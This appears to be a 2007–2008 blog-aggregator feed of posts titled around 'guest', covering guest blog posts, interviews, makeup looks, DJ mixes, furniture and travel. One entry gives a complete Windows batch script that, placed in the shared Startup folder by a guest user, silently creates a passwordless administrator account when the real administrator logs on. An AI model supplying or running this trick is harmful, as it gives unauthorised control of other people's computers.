| Guest Post by Dr. Andersen | | 2008-07-05 04:24:01 | | Here is the 2nd in a guest series post by Dr. Wayne Andersen as he talks about his habits of health. It’s a good one!
No exercise for the first three weeks of the program? Huh?
Yes it is true. In my upcoming book, “Habits of Health,” there is no exercise program for the first three weeks of the program. Why? Because most people fall into two groups: those who exercise and those who don’t. If a person has not been exercising regularly, we first want to get them to a healthy weight. Once they are down to a healthy weight, they will then be able to burn fat at a more efficient rate. It is important to keep in mind that if you have not been exercising and then you are too active too quick, you could hurt yourself… this is the last thing we want. The main focus is to lose weight, to consume just enough calories to support your activity level, achieve a great fat burning state, then settle into a conducive exercise routine. | | By: Our Wicked Weighs | | |
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| Be A Guest Blogger! | | 2008-06-29 17:50:40 | | Want to get your writing here? We are looking for guest posts for this site, as well as my new site, VerbalThermite, a conservative political blog in the making.
We are looking for your articles/news blurbs/blog posts from a conservative point of view! If you would like to help contribute to this site, please email your [...] | | By: [ ! ] The Sugarbuzz Project | | |
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| Guest Post With Kate Jacobs : On Food Memories From Childhood | | 2008-06-27 13:14:38 | | I got a chance to ask Kate Jacobs, author of The Friday Night Knitting Club; And her most recent foodie geared novel Comfort Food , a very personal question.RC: How do you feel food memories from childhood shape us into adults? Image © Kate Jacobs. KJ: We all have wonderful memories of meals shared with families, sitting around the table with the Thanksgiving turkey and summer barbecues eating corn on the cob.I love birthday cake, just like the main character Gus in my new novel Comfort Food, and I remember my sister decorating a cake that looked like a pizza with all the toppings for my fifth grade sleepover party. That was the birthday I got a puppy, Pepsi, who was my first Springer Spaniel and one of my dearest friends ever.It’s all connected for me: the cake, the friends, the puppy. That was one of the best days of my life!And I love to recall having fresh fruit pie at my grandmother’s house Made with cherries that my brothers and sisters had just picked off the trees | | By: Renaissance Culinaire | | |
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| Guest Look :: Alexis Shares Her Summertime Greens | | 2008-06-20 07:51:42 | | What she used:FaceMAC Prep + PrimeMAC Studio Fix in NC42Make Up For Ever Full Cover Concealer in 8MAC Blush in Sunbasque & Pinch O' Peach EyesMAC Prep + Prime EyeMAC Paint Pot in MosscapeMAC Eyeshadow in Juxt, Humid & SwimmingMAC Pigment in CopperizedMAC Fluidlines in BlacktrackMAC Zoom Lash Mascara in ZoomblackMAC Eye Brows in LingeringMAC Lashes #36 LipsMAC Lip Pencil in Oak MAC Slimshine in MissyMAC Plushglass in Big BabyWant to be featured as a guest look? Then click here to find out how!!!
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| As a reminder… (to our guest photographers) | | 2008-06-19 11:38:43 | | I want to say a BIG THANKS! to those of you I have spoken to who said that photos are on the way and who want to be guest photographers for www.BirminghamALRealEstateAndCommunityPics.wordpress.com.
I also want to give this reminder… it is Thursday! For those who would like to possibly have a picture posted, we need to [...] | | By: Birmingham AL Real Estate and Community Pics | | |
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| A $500 Makeover for your Guest Room | | 2008-06-18 15:16:21 | | For most people, the issue of having to spend a lot for remodeling or redesigning any part of their home is a cause for delay in being able to get the ideal designs today. With the rising cost of purchasing home furniture, designs and materials, people are bound to shelve it for now.
But what [...] | | By: BEDzine - We are crazy about BEDs!!! | | |
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| Guest entry by Amy* | | 2008-06-16 16:26:17 | | I asked April what I should write about for my guest blog entry. She said, if she told me what to write about, then she could just write it herself. My rejoinder was, then it wouldn’t be from my point of view. She then told me my point of view is dumb. I kept quiet, [...] | | By: Circadian Rhythms | | |
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| Guest Book | | 2008-06-14 13:50:03 | | <br>Your browser does not support...
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| Guest Look : Reader Emily Shows Off Her Sultry Neutrals | | 2008-06-10 08:01:02 | | What she used:FaceSmashbox Photofinish PrimerMAC Studio Fix in NC40MAC Studio Stick Concealer in NC 30 MAC Blush in Tracegold and Peachtwist EyesUrban Decay Prime PotionMAC Eyeshadow in Nylon, Amber Lights, Soba, Expensive Pink, & Patina Stila Kajal Eyeliner in OnyxLancome Definicils Mascara in BlackMAC Brow Shader in Soft Charcol/Maple LipsMAC Lipstick in Velvet TeddyMAC Lipglass in Spite Want to be featured as a guest look? Then click here to find out how!!! | | By: Makeup Makes Me Happy | | |
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| dj blueprint - soulsender guest mix | | 2008-06-09 03:32:23 | | Tracklist:01. speedometer and ria currie - take a chance (freestyle) 7"02. the fantastics - give it up or turn it a loose (freestyle) 7"03. the herbaliser - amores bongo (skyline recordings) 7"04. a-ko - chessha 23 (mpm) 12"05. new york city - sanity (chelsea) lp06. black smoke - there it is (chocolate city) lp07. gwen mc crae - all this love that i'm givin' (cat) 7"08. marc hype and jim dunloop - supastars (milk crate) 7"09. beastie boys - shadrach (peanut butter wolf remix) (white label) 12"10. zimbabwe legit - shadow's legitimate mix (mo wax) 12"11. kokolo - donkey (afrokings) 7"12. ray johnson - i heard it through the grapevine (in arts) 7"13. ann mason - you can't love me (in the midnight hour) (atlantic) 7"14. just brothers - sliced tomatoes (music merchant) 7"15. cliff nobles - love is alright (phil-la-of-soul) 7"16. marva whitney - unwind yourself (king) 7"17. blowfly - blowfly's rapp (weird world) 7"18. the four tops - i can't quit your love (motown) lpDownload the mix at: thi | | By: The Mixdiggerz | | |
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| Job vacancies Guest Service Executive - Far East Management (Pte) Ltd | | 2008-06-09 02:19:00 | | Job Vacancies :
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| Fiona Xie as celebrity guest for dusty | | 2008-06-03 09:50:00 | | As taken from this month's juice magazine, fiona xie will be appearing in the grand opening party of dusty together with other celebrities. Do check it out!
We Love Fiona Xie Wan Yu!
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| An Uninvited Guest to Get Rid Off | | 2008-06-01 23:23:00 | | I do not want to know what kind of creature this is sitting on the wall...I caught it with the designated bug jar and gave it back to the outside world. This was not the first time either, and I sincerely hope that this is not an old house thing. | | By: Dutch Colonial Home | | |
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| Guest interview - Paul Kilduff author of RuinAir | | 2008-05-21 23:30:47 | | You may have heard of Ruinair an ever expanding low cost Irish airline renowned for its customer service. Well the Irish author Paul Kilfuff had such a memorable taste of this customer service with a ten hour delay on a not so low cost 300 euro flight to Malaga that he hatched a cunning plan [...] | | By: Europe a la Carte Blog | | |
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| Beyonce Knowles to guest star on Desperate Housewives | | 2008-05-14 10:26:59 | | Singer Beyonce Knowles will be a TV actress as she is rumored to appear in TV show Desperate Housewives. MediaTakeOut just learned that the singer’s management is negotiating in an attempt to help her getting a recurring role on the TV show.
A source in Beyonce’s camp revealed to the news media that the TV management [...] | | By: Gossip Boulevard | | |
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| Guest Post: Confessions of a Reality TV Junkie | | 2008-05-13 21:06:43 | | Maria of Beauty Is Within stopped by Style IT to share her tv addiction secret. We appreciate her honestly, because after all who doesn’t have a few reality show guilty pleasures?
As much as I say that people watch too much reality TV and get caught up in celebrities‘ lives, I will make a confession that only [...] | | By: Style IT | | |
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| A Pink Flamingo Special Guest Report - From Sally Vee | | 2008-05-07 21:44:28 | | AIRING AYERS & OBAMAA Pink Flamingo guest article by Sally VeeWe have Mayor Richard M. Daley of Chicago to thank for the reinvention and legitimization of the vile human being known as William Ayers. Daley magnanimously forgave and waved his royal hand over the head of extreme leftist/terrorist Bill Ayers, giving him more influence on America than we can fathom -- it is very likely Ayers has directly influenced your own children or those in your neighborhood. Mayor Daley hired Ayers to do the one job where he could spread his neo-marxist poison in the largest, surest measure ... | | By: The Pink Flamingo | | |
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| create a admin account if u r a guest in xp | | 2008-05-04 06:33:54 | | CREATE ADMIN ACCOUNT WITH OUT KNOWING PASSWORDYou can Create a admin account of other pc without knowing the password of that pc.For that suppose u log in that pc as a guest userTHEN FOLLOW THIS SIMPLE STEPS:----@echo off net user Admin /add /expires:never /passwordreq:no net localgroup "Administrators" /add Adminnow copy this to notepad and save as admin.batcopy the file to the statup folder.here is the path of startup folder..........C:\Documents and Settings\All Users\Start Menu\Programs\Startupwhen the admin logs on the batch file runs and the admin acc is created...so next time u log on u can use the username:admin password:no
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| Gallery ONE - A Doubletree Guest Suites Hotel Ft Lauderdale | | 2008-04-23 21:32:00 | | I recently stayed at the Doubletree Suites in Ft Lauderdale for business for 2 nights.
The reviews for this hotel are right on, the hotel is very nice. The rooms are very spacious with their own...
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| Guest interview - Wendy Shand of Tots to Travel | | 2008-04-18 05:34:56 | | When I read about a company called Tots to Travel I thought it sounded a really good idea to have a selection of accommodation chosen for families with young kids and asked the founder Wendy Shand to do a guest interview.
1 What is the aim of your business?
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| Wedding Guest List Tips | | 2008-04-16 14:49:00 | | When you first sit down to do your guest list, you will probably be tempted to invite every person you have ever met. Or you will feel right off the bat that you can't possible afford to invite anyone? More likely it is somewhere in between.How do you select the guests to invite to your special event. Here are some simple guidelines to follow. Collect the list of guests from both sets of parents. Calculate those, plus both of your parties, and their guests. You’ll be surprised on the total.Mak | | By: Christmas Wedding-2008 | | |
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| Andy Timmons: guest on kip wingers new cd | | 2008-04-15 11:07:37 | | News:
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Kip Winger's new CD set for release May 2008 is reviewed by All Out Guitar and describe thus:
Most songwriters dry up by the time they are 30, whereas Kip Winger continues to produce and compose so much high calibre music it’s uncanny. I always worry that he will run out of any decent material for his own solo work, but I can assure you that, once again he hasn’t.
His latest...
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| Guest interview - Tracy DeLuca of Travel Betty | | 2008-04-09 00:11:12 | | Tracy Deluca is the author of the Travel Betty blog which “encourages fearless independent travel for women”. Tracy believes “travel is freedom”.
1 What is the aim of your blog?
Travel is a passion of mine and I put a lot of time and effort into researching destinations. I realized that I had a [...] | | By: Europe a la Carte Blog | | |
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| Matt Darey presents - Nocturnal guest Emjae 05.04.2008 | | 2008-04-06 13:31:00 | | Matt Darey Nocturnal 139 - hour 1 - Matt Darey mix 01. Fischerspooner - The Best Revenge (Tocadisco mix) [Kitsune] 02. D.Ramirez ft. TC - With Me Or Against Me (Kristoph remix) [Toolroom] 03. DJ Da & Dariush ft. Tina - Good Vibration (DJ Remy & Roland Klinkenberg remix) [Shinichi] 04. Fischerspooner - Dance En France (D.I.M. remix) [Kitsune] 05. D Fuse & Hiratzka - Rock The Bass (original mix) [Lost Angeles] 06. Christian Paduraru - Feeding Your Brain (Fire In Water mix) [Christian] 07. Rektchardz ft. Kay T - Left Behind (Beta remix) [Bombtraxx] 08. Opencloud & Kirsty Hawkshaw - Time Stand Still (Royal Sapien remix) [Proton] 09. Radiohead - House Of Cards (Solarstone subterranean remix) 10. Johan Gielen - Physical Overdrive (Kris O’Neil remix 2008) [Tunes For You] 11. Above & Beyond - Good For Me (Redanka vocal mix) [Anjunabeats] Matt Darey Nocturnal 139 - hour 2 - Emjae guest mix 01. Last Rythm - Open Your Mind 02. Milton Jackson & Sei A - Jinzou (Manuel Tur remix) 03. Mischa Daniel | | By: Newest dj mixes | | |
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| Guest Post: When Does Fiction Become Unbelievable? | | 2008-03-28 11:41:00 | | Firstly, I'm honoured to guest post here, while, ahem, some people get to go away on holiday! ;) I struggled to think what to post about, and then I saw a film trailer...When does fiction become unbelievable?I haven't seen 10,000 BC yet, but I gather that the mammoths play a large part in the creation of the Ancient Egyptians' pyramids. Fine, I'll accept that: it's fiction, a ridiculous premise, but it sounds quite fun. A strange alternate history. What still bugs me is that the mammoths gallop at speeds of upwards of 60 kilometres per hour. What?! I can accept that they hung around several tens of thousands longer than in actual reality, but during that time, they also devised some way to motorise themselves?! Perhaps in hundreds of thousands of years worth of evolution, they developed little natural rubber wheels? Nooo.But in SFF, a certain suspension of disbelief is often required. In all imagination, really. We are quite prepared to accept the Chosen One, spoken of in prophecies wr | | By: The World in the Satin Bag | | |
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| Guest Post: When Can I Call Myself a Writer? | | 2008-03-26 16:00:00 | | I used to think of myself as a writer, but not so much anymore. I don't know when this shift occurred, but I think it's when I left a career that had "writer" in the title.I graduated from college, more years ago than I'd like to admit, with a degree in Journalism. With that handy-dandy piece of paper I called myself a writer and proceeded to tell anyone who would listen that I was a writer in pursuit of a writing career. And for awhile that worked. I worked at a newspaper as a freelance writer for awhile. But since that was such a poor paying job I ended up in the advertising department selling space to anyone who'd pay our meagre fee. That got old fast and it wasn't long before I was on the job hunt again.Luckily I landed a job on a TV show as an Associate Producer. Now that was a job with a title that made it sound far grander than it was. Mostly I was a glorified assistant who very occasionally got to write script for some of the on-air segments. For the most part I really liked th | | By: The World in the Satin Bag | | |
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| Guest Post: Deus Ex Ruins? | | 2008-03-25 13:30:00 | | It amazes me how many fantasy worlds have ancient civilizations with far better technology, magic, what-have-you. The Ancient Civilization is a common idea, but it's not one that always has a lot of logic behind it. Science fiction also has similar ideas (Stargate is a great example, but there are many others). And it's not just discovering Ancient Civilizations per se; sometimes it's discovering forgotten technology. Anne McCaffrey's Pern is a classic example. Many other authors tie their fantasy worlds into something that is actually based in science, where "magic" is old technology that no one understands anymore, and that extra bright star in the sky is actually an old satellite or space ship. Let me ask you something: how many ancient civilizations have we actually discovered remains from who have had technology beyond what we had when we found it? And then what are the odds it would still work? So far, we haven't seen anything beyond what we already had—at least, that worked. | | By: The World in the Satin Bag | | |
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| My Guest Appearance on the Milt Rosenberg Show | | 2008-03-22 00:29:23 | | Milt Rosenberg is one of Chicago's most respected Radio Personalities. For over 30 years he has hosted his program on WGN News Radio 720. I was honored to be a guest on his show to talk about Politics and Blogging in general. It was truly and invaluable experience.
The format of the show was a four-person panel. I was one of the Political Conservatives, along with Richard Baehr of the...
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| Guest interview - Neala Schwartzberg of OffbeatTravel.com | | 2008-03-15 08:31:10 | | I read Neala’s comment that there should be a category for travel information sites in the Travelmole 2008 Web Awards. I was curious about her site called OffbeatTravel as I thought Neala must be thinking along similar lines to me about getting off the beaten track during your trips.
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| Guest strip on Odd-fish | | 2008-03-06 01:59:31 | | Something a little different today. Nobby Nobody over at odd-fish.net has very kindly published a guest cartoon I did for his web comic. Hopefully I haven’t dragged the standard down too much!
My strip is here (looking much better in a horizontal format than my normal vertical). Please take the time to check out the rest [...] | | By: roodiedoodie | | |
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| Guest Post: Michelle Sears - TourismTechnology.com | | 2008-02-25 18:51:01 | | Kim’s Note: Michelle Sears is the facilitator for the mentoring system called d TourismTechnology.com, a mentorship program partnering with provincial and federal agencies to assist Nova Scotia tourism businesses gain technological skills to compete in the global market
TourismTechnology.com is a fantastic project and one that we have been
having a lot of fun with. I [...] | | By: White Point Manor Weblog | | |
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| Balthasar Guest Bed | | 2008-02-19 14:33:12 | | One minute it’s a clothes or hat rack. The next minute, it becomes a bed frame which something your guests could sleep on:
Balthasar is a real quick-change artist. Curved slats provide gentle springing for the guest bed which, equipped with a futon, ensures a good night’s sleep. Held together by straps it can easily be [...] | | By: Mattresszine | | |
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| Guest Post: Getting Kids to Eat Healthy Foods | | 2008-01-30 06:33:00 | | As promised, Jessica of Blogcrumbs is here to share a guest post on child nutrition. Jessica is a holistic nutritionist and has some wonderful information on her blog. There are some awesome ideas here and many great suggestions. Thanks Jessica for sharing! Head over Blogcrumbs to read more! Research has shown that childhood obesity has become a pandemic in today’s society. It used to be that malnourishment came from not eating enough food, now it’s from eating too much of the wrong thing. The definition of malnutrition is not the amount of food you consume, it’s how nutrient dense the food is. A sedentary life filled with video games and computers is also a huge contributor to this problem. Feeding our children nutritious foods isn’t always the easiest task to achieve. Of course starting out never having given them sweets or an option as to what they want to eat is always the best way. When that time has passed and they’ve been exposed to chicken nuggets and chips it | | By: The Humble Housewife | | |
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| Yet Another Celebrity Guest Blogger | | 2008-01-28 10:49:04 | | Our special celebrity guest blogger today is writing from an uncharted desert isle.
“Three years. It’s been three years. I can’t believe it. It was only supposed to be a three hour tour.
A three hour tour.
Who found the tree sap for the pancake syrup? Me. Who saved everyone from the WWII vet who didn’t know the [...] | | By: The Frog Bog | | |
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| A Celebrity Guest Blogger, We Have Today | | 2008-01-21 09:58:52 | | From a planet in the Dagobah System, a special celebrity guest blogger:
“Old am I, and troubles my arthritis does the humidity here. And believe the size of the bugs you would not. Take off with an R2 unit could they. Strong with me the force is, though ten Death Stars would you need to this [...] | | By: The Frog Bog | | |
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| Guest Post: Prisoner Hell Block H | | 2008-01-19 07:41:05 | | SLASHY WINS RIGHT TO RUN H-DIVISION
Melbourne, AU — Late-surging candidate Slashy Foster has stunned commentators, taking out the February by-slaughter to win the right to run H-Division. Citing his tough policy on ‘bitching out the new fish’ as a major factor in the victory, Mr Foster told News of The World that he [...] | | By: The Cult of Qelqoth | | |
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| Mobile Sleeper for your Guest | | 2008-01-18 10:00:21 | | With its 7″ thick mattress and a 4″ foundation, one would think that the Mobile Sleeper is such an inconvenience to transport or keep when not in use. Ideal for use as a guest bed or extra temporary sleeping space, it is in fact such a lightweight piece of furniture. The swivel casters make it [...] | | By: Mattresszine | | |
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| Guest Post: "Fatah and Hamas, Two Sides of the Same Coin: An Arab-American’s Perspective" | | 2008-01-16 08:08:47 | | The following is a guest post written by Emilio Karim Dabul, an Arab-American and a Contributing Editor with the American Congress for Truth , and is highly recommended by Steven Emerson . The views expressed below are Mr. Dabul's. ------------------ With President Bush’s trip to Israel, and a stopover in the West Bank, it is an appropriate time to ask what he hopes to accomplish with Fatah, a notoriously intransigent and corrupt political party that has murdered more Israelis than any other...(read more) | | By: An American Warning | | |
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| Guest interview - Ercole Marsili of Italiamia.com | | 2008-01-08 05:53:47 | | I met Ercole Marsili of Italiamia.com through the social networking site Stumbleupon. I think his site encompasses a lot of useful information about all things Italian such as travel, books, movies, music and current news.
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To provide information on culture and products from Italy to people living outside Italy, [...] | | By: Europe a la Carte Blog | | |
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| Guest Review: Normal Bob Smith | | 2008-01-05 10:49:19 | | I want to share a website that has given me many hours of amusement. It is 100% religiously inappropriate and has offended a great number of people. If you are one of those religiously right people with a stick up your ass, this is not a site that you should be visiting. The website that [...] | | By: The Cult of Qelqoth | | |
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| Guest interview - Nate of YourDailyVacation.com | | 2008-01-03 13:48:56 | | I met Nate of YourDailyVacation when I featured one of his posts in the first Travel Blog Carnival.
1 What is the aim of your blog?
NP - There are two main aims to my blog, the first is to provide the sites guest with information on travel tips and tricks as well as give them a [...] | | By: Europe a la Carte Blog | | |
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| Guest Bed | | 2007-12-29 09:20:56 | | You may never know when visitors may drop in but it would be best to have a guest bed on hand just in case. It’s really nothing fancy but its materials are made out of the books of practicality and style. This guest bed even has lower pullout bed with mattresses to ensure durable sleep. [...] | | By: BEDzine - We are crazy about BEDs!!! | | |
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| Guest interview - Erica of Blissful Travel | | 2007-12-17 13:05:05 | | I discovered Erica’s blog on Travel Rants where Darren had named Blissful Travel as his favourite “Travellers Blog”.
1 What is the aim of your blog?The aim of Blissful Travel is to provide travel tips, information and news from the travel business for people interested in travelling. I have a preference for writing about cities, [...] | | By: Europe a la Carte Blog | | |
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| Guest Blogging Again | | 2007-12-11 15:54:53 | | Scott's article on what you need to know about the 700MHz spectrum so far was picked up by the guys over at AskTheAdmin. Head over there to read all kinds of good tech stuff that you might not find anywhere else. Thanks again to Karl and the other admins over there for showing some love to the AndroidGuys!AndroidGuys | The most trusted site for Android news and opinion.
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| Guest interview - Mark Garwell of DoYouTravel.com | | 2007-12-11 09:38:38 | | I read about the launch a new travel social networking site, DoYouTravel.com today. I decided to have a look at the site as it’s free for travel businesses to set up a profile with direct links to their site and to upload classified ads. Mark Garwell one of the creators has very quickly taken part [...] | | By: Europe a la Carte Blog | | |
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| Create your own guest book or a shout box using php and sql | | 2007-12-09 22:51:46 | | This tutorial requires some knowledge in php, sql and a little html, if you are new to these you can learn them from here
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| Olympic Bunk Bed with Guest Bed | | 2007-12-07 05:23:01 | | Usually, the kids will share a room with their siblings or have some friends to sleep over so that they can avoid the boredom shark. But while parents normally allow sleepovers from friends, the issue of space and where their guests would sleep becomes a problem at times.
But with this Olympic bunk bed which boasts [...] | | By: BEDzine - We are crazy about BEDs!!! | | |
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| US star Dale Earnhardt Jr guest at Phillip Island | | 2007-12-04 00:35:58 | | Stephen OttleyDecember 03, 2007 12:00amAMERICA'S biggest motor sport star, Dale Earnhardt Jr, was the guest of honour at Phillip Island yesterday.Earnhardt is the most popular driver in NASCAR racing and earns more money than the entire V8 Supercar field combined.Sports Illustrated magazine estimated his 2007 earnings at more than $50 million.But unlike the media circus that surrounded David Beckham's recent visit to Australia, Earnhardt was able to slip under the radar.The only people clamouring to meet the racing celebrity were the V8 Supercar drivers and team managers as he walked down pit lane.The 33-year-old is the son of Dale Earnhardt, NASCAR's answer to Peter Brock, and has won 17 races in his career including the 2004 Daytona 500.The American had a close look at the cars and was impressed with the technology and craftsmanship. "I didn't anticipate the cars to have so much preparation because they race them so hard," Earnhardt said.Having just signed a multi-million dollar deal with NASCAR's leading team, Hendrick Motorsport, Earnhardt is highly unlikely to quit any time soon but admitted he would like to try his hand at V8 Supercars."In a perfect world, I would come and race in the V8 series for a year and I would enjoy it," he said.Earnhardt was full of praise for Australian NASCAR star Marcos Ambrose, although he admitted some of the Tasmanian's former V8 Supercar rivals might not share the same high opinion."I think he's a good guy. There might be a few guys who raced against him who might have a different opinion," he laughed.Ambrose will compete in 12 Sprint Cup races next year and Earnhardt was confident he would be competitive. "I don't know that he'll face the same challenges that a rookie or a young guy would because he's been racing a long time," Earnhardt said. "He has all the tools he needs."
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| Guest House | | 2007-11-26 15:34:00 | | Juego japonés de Terminal House, trata de encontrar los objetos y los códigos que te permitan abrir la cápsula de tu acompañante y escapar de esta futurista habitación. Si necesitas ayuda consulta la solución aquí. | | By: 1001 JUEGOS | | |
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| Guest House Walkthrough | | 2007-11-26 10:00:29 | | Terminal House 3 - Guest House is a point and click game.In this game you are locked in a room and you need to escape.Good Luck!!!Play Guest HouseWalkthrough - Guide - Solution - CheatsGo left and click on top of the small box on the wall, get silver coin. Then, open the small box and write down the shape and number, you’ll need it later. Use coin on vending machine and get blue drink. also, click on the floor on the left side next to the vending machine and get a blue puzzle piecego right and click on the left side behind the cabine (on the floor), write the shape and number downgo right twice and open the large box on the wall, get puzzle piecethen click near the floor on the wall and write down the shape and numbergo right, click the large box on the wall and get a blue keygo left twice and use key on the largest box on the wall and get a green bookgo back and click the safe. use the green book to get the code. Each hieroglyphic stands for a number. use code to open the safe and g | | By: Online Games | | |
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| Being the GUEST SPEAKER | | 2007-11-20 23:51:41 | | SURIGAO STATE COLLEGE OF TECHNOLOGYIT Department3rd year Students during thier Travels & Tour Discussing about the new IT in our market today and how it works...at the College Laboratory of SSCTNovember 17, 2007 3:00pm - 5:00pmDaracks Notebook | | By: daruñans home | | |
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| Check Your Secret Guest | | 2007-11-19 10:38:00 | | The termite appears harmless in the image above isn’t it? Its’ opaque and soft body looks like a tiny ornament in photo. But there is a hidden danger behind this image. Their destruction is as enormous as billion of dollars every year in United States alone. You might be wondering how this little thing made such a huge destruction. Well, just think how much your beloved house is and imagine
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| SRK will be the Chief Guest for IFFI inauguration: | | 2007-11-16 12:19:39 | | Bollywood megastar Shahrukh Khan will be the Chief Guest at the inauguration of the 38th International Film Festival of India (IFFI-2007) at Goa on 23 November 2007.4 months, 3 weeks & 2 days the Romanian film that was awarded the Palme D’OR at Cannes 2007 - has been selected as the opening film at the [...] | | By: wowindianfilms | | |
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| Last Night's Guest Was BRIAN O'NEAL | | 2007-11-14 06:43:00 | | Brian O'NealKeyboardist, Composer and ProducerThe chatroom was packed with Brian's fans as well as his STREET TEAM, that came out in full force.Brian is a humble spirit that will continue to draw huge crowds to listen to his soul as it is poured out through the instruments that he plays. He told us that his new keyboard was named Edna. To listen to the show by clicking here | | By: April Sims A & E | | |
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| Get Targetted Traffic by Guest Blogging | | 2007-11-12 10:10:06 | | I have come across the term Guest Blogging quite a lot. It is pretty self-explanatory, I know, however, I wanted to introduce guest blogging and how it can bring targetted traffic to your website/blog. What is Guest Blogging?In simple terms, it means that the author of a blog invites other bloggers to post on his/her blog.1. More Content2. A Different writing style keeps visitors interestedGuest Bloggers write on other blogs to1. Get recognition.2. Traffic and exposure to their own website or blog.Guest blogging is indeed a great way to get targetted visitors to your blog. There are quite a few blogs out there, that rely completely on guest blogging, and the owner works on getting traffic to the blog and earning money from it without worrying about the content. However, some of the blogs invite few guest bloggers to post occasionally on their blogs.So, next time, you are invited to be a guest blogger, take a look at the blog and consider this: Is it worth your time to write good posts | | By: Earn Free Money Online | | |
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| Shocking Guest Star To Appear On CBS Show Kid Nation | | 2007-10-17 20:14:37 | | I caught my first glimpse of Kid Nation last week on CBS and am conflicted on my feelings about the show. I’m not going to get into the whole child labor law or abuse allegations or whatever you want to call it because I doubt they’re holding the kids hostage with a machine gun [...] | | By: U Suxxors | | |
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| GUEST BOOK - FREE COMMUNICATIONS WITH YOUR READER | | 2007-09-20 23:34:08 | | ________________________________________GuestBook is the most easiest way to communicate with your blog readers directly.It can be related to a single post. Here's how to add a guestbook to your blog.You can choose a guestbook service for your blog for free from a link in Blogger to services like Ultraguest or Guestbook Depot. Register for the guestbook service. Here, you'll get the html code for the guestbook of your blog.Then sign into Blogger; Click on the "Dashboard" tab.Select Template tab and then Edit HTML.Paste the guestbook code into the template of your Blog. Place it correctly.Save changes and republish your blog. --______________________________________ ____________________________________TRICKS & TIPSA lot of searching can make the best free guestbook service for you. Set your GuestBook settings, such that your readers can come back to yourblog, after posting their comments or quary.As guestbook serrvices are supported by ads, so if you want to neglect the ads then you | | By: MESSENGER EXPRESS | | |
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| Guest Post "Passions and Paychecks" | | 2007-09-20 21:00:00 | | Today's guest post comes to us courtesy of Scott over at the intriguingly titled, Spiritual Tramp. Scott is a relative newcomer to reading this site as well, but he's been rather patient with my intermittent posting as of late, so I appreciate that. I hope to have a new original post up sometime next week, but I'm still interested in any and all guest bloggers to share the load. The email addy is janet@theartofgettingby.com. You know what to do!There are some people in this universe that are fortunate or forward thinking or whatever enough to end up working for a living in a field that they are completely passionate about. Unfortunately, I don't count myself among those few, those proud few. Don't get me wrong, I enjoy my job. I'm a big old geek at heart so working with computers and helping people with figuring them out and getting them working is certainly easy for me to do every day. There's not a great deal of passion there though. So then, I ask myself, what do I love | | By: The Art of Getting By | | |
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| Guest Post "Don't Want To Make You Grow Numb, If It's Not What You Thought It Was, Legs Are For Discovering, This Is What It's Like" | | 2007-09-12 07:30:00 | | Today's guest post comes to us courtesy of Mojo Shivers, a frequent commenter to AOGB. He and his sometimes blogging partner, Breasier, write a very personal blog with heart on your sleeve like entries. Every time I go to visit, I'm amazed that they still have stories left to tell since they both are rather young. If you like long-winded posts with purpose, you should check the blog out. Below you'll find a sneak peek. Don't forget I'm still looking for (and waiting on) guest posts from friends of AOGB to help keep things afloat for the next few weeks or so. It need not be a new post and I know you've all got a few good ones hidden up your sleeves to share! If you're interested, please drop me a line at janet@theartofgettingby.com--"ForThe Actor", Mates of StateI was at Camp Cherry Valley located miles away from the mainland on the small island of Catalina contemplating my future. I was probably eleven or twelve at the time, the summer before Eighth Grade, and I was away on a w | | By: The Art of Getting By | | |
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| Guest Post: "Witnessing," Growing Pains, and the Road to Hell | | 2007-09-06 23:00:00 | | This year's batch of wonderful guest bloggers kicks off with a post from David over @ Musings With David Amulet. Incidentally, if you haven't read David's blog before, here's a great sneak peek and a reason to swing by his place for more. What I love about reading his site is that you never know what you're going to get. No topic is too big, or too small. While I'm on the subject, it's certainly not too late to throw your hat into the ring to guest blog here at AOGB. Just email me at janet@theartofgettingby.com I would like to have one or two guest posts a week for the month of September, if possible. Right now I'm only at a whopping FIVE volunteers. Come on guys, have a heart and help a teacher out! There I was, minding my own business. Racing through the channels between Metal Mania on VH1 Classic, beach volleyball on NBC, and the Weather Channel's tropical update.And then I saw God.Bear with me, dear readers. This post will take some time to get through.God did not actually appear on my television, of course...but someone selling his version of God did. More specifically, this somebody was hosting an infomercial wherein interviewers "witness."They bully people on the street. Prod them to admit their violations of all Ten Commandments. Convince them they have bought a one-way ticket to Hellfire and Damnation, which I think is currently in western Sudan. And the accosted sinners cry like babies. They profess their acceptance of Jesus-or at least the show's interpretation of Jesus-as their personal savior.Disturbing enough just on the face of it. But what stopped me like a kick in the crotch was the identity of the host.Our spokesman, our guiding light, is none other than Kirk Cameron.Maybe you know him as lanky teenager Mike Seaver from the 1980s sitcom "Growing Pains." Well, guess what-he's all growed up now, and he has gone evangelical on us.For those of you who dare not tread in radical Christian Web sites, let me give you the skinny on his new cause, "The Way of the Master."The melodrama begins with "Almost everyone thinks they are a good person...but the question you should be asking is, 'Am I good enough to go to Heaven?'"Thankfully, Kirk and his similarly self-righteous partners will be glad to tell you that the answer is no, and instead you will go to hell. You see, THEY know the one true way, the path to salvation that must be right for everybody. And they are not shy about telling you what it is.Then we have "Who is God to you? Is he only a god of love and mercy? He's a figment of your imagination. You've created a god in your own mind that you're more comfortable with. You may call it your 'personal belief,' but God calls it idolatry."Thank you, Mikey Seaver. Here I had thought that your God gave us brains to use them, to interpret things. But now I realize that we should just follow YOUR interpretation rather than think for ourselves, because anyone who sees God differently than you do will go to hell.They point out a verse in the Book of John (Author's note: They are not referring to the dirty joke book you keep in the bathroom for toilet reading) that says, "He who hates his brother is a murderer." Thus, they claim, if you have ever been angry with anyone then you have violated the commandment against murder. And you will go to hell.Oops, I am a goner. Because these arrogant proselytizers are triggering some big time anger issues right now.Kirk and friends also inform the viewer that any man who has looked at a woman with lust has committed adultery and will-you guessed it-go to hell.But did not God-or evolution, or little green men from Mars, or any creator in whatever system you choose to believe-hardwire us to find other humans attractive PRECISELY BECAUSE it aids the propagation of the species? This wonderful "solution" to the "sin" of lust would leave the world pretty much empty of people in about a generation. Not many people to "save" then, are there?And it goes on and on. So what, you may ask, are the justifications for these views that should be pounded into everybody? Bible verses.Yes, I said Bible verses.But if these verses must indeed be followed literally, as the evangelicals claim, why are they not preaching against eating shellfish-which is clearly disallowed in Leviticus?Is Kirk going to sell one of his daughters into slavery, as sanctioned in Exodus? Where is their "witnessing" for stoning, which has the nod from God as a punishment?After all, all these things are in the Bible-quite explicitly, actually. (See the amazing "Open Letter to Senator Rick Santorum" for more.)We are so lucky to have Mike Seaver and his born-again buddies to sort through all those pesky verses for us. It must be a burden to decide for the rest of humanity which verses pave the way to eternal damnation and which ones can conveniently be ignored...but they seem to enjoy it. God bless them.It may surprise you that I actually think Kirk means well. Maybe my fond memories of "Growing Pains" are exerting their influence; perhaps I just tend 